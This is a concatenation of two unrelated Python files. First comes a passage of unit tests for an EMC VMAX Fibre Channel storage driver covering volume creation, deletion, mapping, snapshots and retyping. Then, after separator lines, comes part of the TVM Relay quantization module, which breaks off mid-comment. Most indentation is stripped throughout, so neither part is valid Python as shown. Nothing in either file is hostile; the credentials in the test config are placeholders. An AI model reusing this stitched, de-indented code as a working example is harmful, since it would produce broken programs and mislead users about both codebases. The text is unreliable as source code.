self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_no_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
def test_delete_volume_no_fast_notfound(self, _mock_volume_type):
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_failed(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_last_volume_success(self, mock_volume_type,
mock_storage_system,
mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_no_fast_success(self, _mock_volume_type,
_mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_no_fast_failed(
self, _mock_volume_type, _mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
def test_create_volume_from_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_no_fast_success(self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
def test_create_clone_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
def test_migrate_volume_no_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
def test_retype_volume_no_fast_success(
self, _mock_volume_type, mock_values):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def _cleanup(self):
        if os.path.exists(self.config_file_path):
            os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
class EMCVMAXFCDriverFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXFCDriverFastTestCase, self).setUp()
self.config_file_path = None
self.create_fake_config_file_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.cinder_emc_config_file = self.config_file_path
configuration.safe_get.return_value = 'FCFAST'
configuration.config_group = 'FCFAST'
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXFCDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
def create_fake_config_file_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
fastPolicy = doc.createElement("FastPolicy")
fastPolicyText = doc.createTextNode("GOLD1")
emc.appendChild(fastPolicy)
fastPolicy.appendChild(fastPolicyText)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
filename = 'cinder_emc_config_FCFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
        with open(self.config_file_path, 'w') as f:
            doc.writexml(f)
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_sleep(self, seconds):
return
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=True)
@mock.patch.object(
EMCVMAXFast,
'get_tier_policy_by_name',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'get_capacities_associated_to_policy',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_fast(self,
mock_storage_system,
mock_is_fast_enabled,
mock_get_policy,
mock_capacity,
mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_striped_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_delete_volume_fast_success(self, _mock_volume_type,
mock_storage_group):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
def test_delete_volume_fast_notfound(self, _mock_volume_type):
"""We do not set the provider location.
"""
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_delete_volume_fast_failed(
self, _mock_volume_type, mock_wrapper,
mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_last_volume_success(
self, mock_volume_type,
mock_storage_system, mock_storage_group):
self.driver.terminate_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_fast_success(self, _mock_volume_type,
_mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_fast_failed(self, _mock_volume_type,
_mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_snapshot_fast_success(self, mock_volume_type,
mock_storage_group, mock_volume,
mock_sync_sv,
mock_storage_config_service,
mock_controller_config_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_volume_from_snapshot_fast_success(
self, mock_volume_type, mock_storage_group, mock_volume,
mock_sync_sv, mock_storage_config_service,
mock_controller_config_service, mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: pool': 'gold',
'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_replication_service',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_fast_failed(self, mock_volume_type,
mock_rep_service,
mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_clone_fast_success(self, mock_volume_type,
mock_storage_group, mock_volume,
mock_sync_sv,
mock_storage_config_service,
mock_controller_config_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_replication_service',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_fast_failed(self, mock_volume_type,
mock_rep_service, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
def test_migrate_volume_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_retype_volume_fast_success(
self, _mock_volume_type, mock_values, mock_wrap):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def _cleanup(self):
        if os.path.exists(self.config_file_path):
            os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#pylint: disable=unused-argument
"""Automatic quantization toolkit."""
from __future__ import absolute_import
import numpy as np
from . import _quantize
from .. import expr as _expr
from .. import module as _module
from .. import analysis as _analysis
from .. import transform as _transform
from .. import op as _op
from ... import make as _make
from ..base import NodeBase, register_relay_node
class QAnnotateKind(object):
"""Denote the kind of annotation field, corresponding
    to different nbit configurations."""
IDENTITY = 0
INPUT = 1
WEIGHT = 2
ACTIVATION = 3
def kind2str(kind):
"""Convert a `QAnnotateKind` to string"""
str_map = {
QAnnotateKind.INPUT: "input",
QAnnotateKind.WEIGHT: "weight",
QAnnotateKind.ACTIVATION: "activation",
QAnnotateKind.IDENTITY: "identity"
}
assert kind in str_map
return str_map[kind]
def _forward_op(ref_call, args):
"""forward the operator of ref_call with provided arguments"""
return _expr.Call(
ref_call.op, args, ref_call.attrs, ref_call.type_args)
@register_relay_node("relay.quantize.QConfig")
class QConfig(NodeBase):
"""Configure the quantization behavior by setting config variables.
Note
----
This object is backed by node system in C++, with arguments that can be
exchanged between python and C++.
Do not construct directly, use qconfig instead.
The fields that are backed by the C++ node are immutable once an instance
is constructed. See _node_defaults for the fields.
"""
_node_defaults = {
"nbit_input": 8,
"nbit_weight": 8,
"nbit_activation": 32,
"dtype_input": "int8",
"dtype_weight": "int8",
"dtype_activation": "int32",
"global_scale": 8.0,
"skip_conv_layers": [0],
"do_simulation": False,
"round_for_shift": True,
"debug_enabled_ops": None,
}
# pylint: disable=no-member
def __init__(self, handle):
"""Initialize the function with handle
Parameters
----------
handle : SymbolHandle
the handle to the underlying C++ Symbol
"""
super(QConfig, self).__init__(handle)
self.handle = handle
def guard(self, ref_call):
"""Return true if op is enabled, otherwise return false"""
op_name = ref_call.op.name
if self.debug_enabled_ops is not None:
name_list = [x.value for x in self.debug_enabled_ops]
if op_name not in name_list:
return False
return True
def get_nbit_by_kind(self, kind):
name = kind2str(kind)
return getattr(self, 'nbit_' + name)
def get_dtype_by_kind(self, kind):
name = kind2str(kind)
return getattr(self, 'dtype_' + name)
def __enter__(self):
# pylint: disable=protected-access
_quantize._EnterQConfigScope(self)
return self
def __exit__(self, ptype, value, trace):
_quantize._ExitQConfigScope(self)
def __setattr__(self, name, value):
if name in QConfig._node_defaults:
raise AttributeError(
"'%s' object cannot set attribute '%s'" % (str(type(self)), name))
return super(QConfig, self).__setattr__(name, value)
def current_qconfig():
"""Get the current quantization configuration."""
return _quantize._GetCurrentQConfig()
def qconfig(**kwargs):
"""Configure the quantization behavior by setting config variables.
Parameters
    ----------
nbit_dict: dict of QAnnotateKind -> int
        Number of bits for every kind of annotate field.
global_scale: float
The global scale for calibration.
skip_conv_layers: list
Specifying which layers to be skipped. Provide a list of indices
that indicate which conv2d layers to leave untouched. Start from 0.
do_simulation: boolean
Whether to do simulation with float operation only.
round_for_shift: boolean
Whether to add bias for rounding during shift.
debug_enabled_ops: None or list of str
Partially quantize specified operators for debugging. The default value
        is None, which means it will try to call all operators' annotate
        rewrite functions.
Returns
-------
config: QConfig
The quantization configuration
"""
node_args = {k: v if k not in kwargs else kwargs[k]
for k, v in QConfig._node_defaults.items()}
return _make.node("relay.quantize.QConfig", **node_args)
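# A minimal usage sketch: QConfig defines __enter__/__exit__, so the node
# returned by qconfig() acts as a scope that current_qconfig() reads from:
#
#   with qconfig(nbit_weight=8, global_scale=16.0):
#       assert current_qconfig().global_scale == 16.0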
class QuantizeContext(object):
"""An internal used global context object for annotation,
for putting some state variables like `conv2d_counter`."""
Current = None
def __init__(self):
self.qnode_map = dict()
self._conv2d_counter = 0
self._stop_quantize = False
def check_to_skip(self, ref_call):
"""Check the index of conv2d layer to decide whether to
skip the current operator."""
if self._stop_quantize:
return True
if current_qconfig().skip_conv_layers is not None:
# check skip conv layers
skipped_indices = [int(x) for x in current_qconfig().skip_conv_layers]
if self._conv2d_counter in skipped_indices:
if ref_call.op.name == 'nn.conv2d':
self._conv2d_counter += 1
return True
if ref_call.op.name == 'nn.conv2d':
self._conv2d_counter += 1
return False
def stop_quantize(self):
self._stop_quantize = True
def reset(self):
self._conv2d_counter = 0
self._stop_quantize = False
def __enter__(self):
self.reset()
return self
def __exit__(self, ptype, value, traceback):
pass
def quantize_context():
"""Get the global singleton scope"""
if QuantizeContext.Current is None:
QuantizeContext.Current = QuantizeContext()
return QuantizeContext.Current
def partition():
"""Partition graph into small low-precision sections by `cast_hint` and
`stop_fusion`.
Returns
-------
ret: tvm.relay.Pass
        The registered pass for quantization partitioning.
"""
return _quantize.QuantizePartition()
def annotate():
"""Given a float32 graph, this pass will rewrite the graph and return
a graph which simulates the error brought by the current quantization
scheme.
Returns
-------
ret: tvm.relay.Pass
The registered pass for quantization annotation.
"""
return _quantize.QuantizeAnnotate()
def collect_stats(graph):
"""Given an annotated graph, create a profile graph to collect profile data from the
    calibration dataset. This pass collects the inputs of simulated_quantize
    ops into a tuple and rewrites the simulated_quantize ops to identity
    mode. The tuple is the output of the profile graph.
Parameters
----------
graph: Function
The simulation graph after annotation.
Returns
-------
ret: Function
The profile graph which outputs a tuple of profile data.
"""
return _quantize.CollectStats(graph)
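# Sketch of how collect_stats feeds calibrate: run the profile graph over
# the calibration dataset, reduce its tuple output to per-layer scales,
# then pass those to calibrate(). `annotated_func` and the reduction step
# are assumed placeholders:
#
#   profile_graph = collect_stats(annotated_func)
#   # ... execute profile_graph on the dataset and derive `scales` ...
#   calibrated = calibrate(annotated_func, scales=scales)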
def calibrate(graph, mod=None, ctx=None, weight_scales='power2', scales=None):
"""The calibrate procedure will try to calculate the content of
dom_scale, nbit, clip_min, clip_max for every `simulated_quantize`
operator.
Parameters
    ----------
graph: Function
The simulation graph after annotation.
mod: tvm.relay.Module
The module where calibration happens on.
ctx: tvm.relay.PassContext
The pass context used for calibration.
weight_scales: 'power2' or 'max'.
The way to calculate scales for weights (annotated with QAnnotateKind.WEIGHT).
power2: Find the maximum of the absolute value of the tensor, and then round up to power
of two.
max: Find the maximum of the absolute value of the tensor.
scales: List[float]
Pre-calculated scales for input and activations. Length and the order of elements of the
scales list should match the output tuple of the profile graph created by collect_stats.
Returns
-------
ret: Function
The graph after calibration
"""
def power2_scale(arr):
"""calculate weight scale with nearest mode-2 scale"""
val = np.amax(np.abs(arr.asnumpy()))
return 2**np.math.ceil(np.math.log(val, 2)) if val > 0 else 1.0
def max_scale(arr):
"""calculate weight scale with maximum absolute value"""
val = np.amax(np.abs(arr.asnumpy()))
return val
scale_idx = 0
cfg = current_qconfig()
const_params = {}
quantize_op = _op.get("relay.op.annotation.simulated_quantize")
def visit_func(expr):
"""Internal visit function"""
nonlocal scale_idx
if isinstance(expr, _expr.Call) and expr.op == quantize_op:
_, ndom_scale, nclip_min, nclip_max = expr.args
attrs = expr.attrs
kind = attrs.kind
nbit = cfg.get_nbit_by_kind(kind)
valid_bit = nbit - attrs.sign
if kind in [QAnnotateKind.WEIGHT]:
if all([isinstance(arg, _expr.Constant)
for arg in [ndom_scale, nclip_min, nclip_max]]):
return
var = expr.args[0]
assert isinstance(var, _expr.Constant)
if weight_scales == 'max':
scale = max_scale(var.data)
elif weight_scales == 'power2':
scale = power2_scale(var.data)
else:
raise ValueError('{} not supported'.format(weight_scales))
elif scales is not None:
scale = scales[scale_idx]
scale_idx += 1
else:
scale = cfg.global_scale
def _make_const(val):
return _expr.const(val, 'float32')
valid_range = 2**valid_bit
const_params[ndom_scale] = _make_const(scale / valid_range)
const_params[nclip_min] = _make_const(- (valid_range - 1))
const_params[nclip_max] = _make_const((valid_range - 1))
_analysis.post_order_visit(graph, visit_func)
ret = _expr.bind(graph, const_params)
return ret
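# Worked example for the helpers above: a weight tensor whose maximum
# absolute value is 3.0 gets scale 3.0 from max_scale and 4.0 from
# power2_scale (2**ceil(log2(3.0))). With nbit=8 and sign=1, valid_bit is
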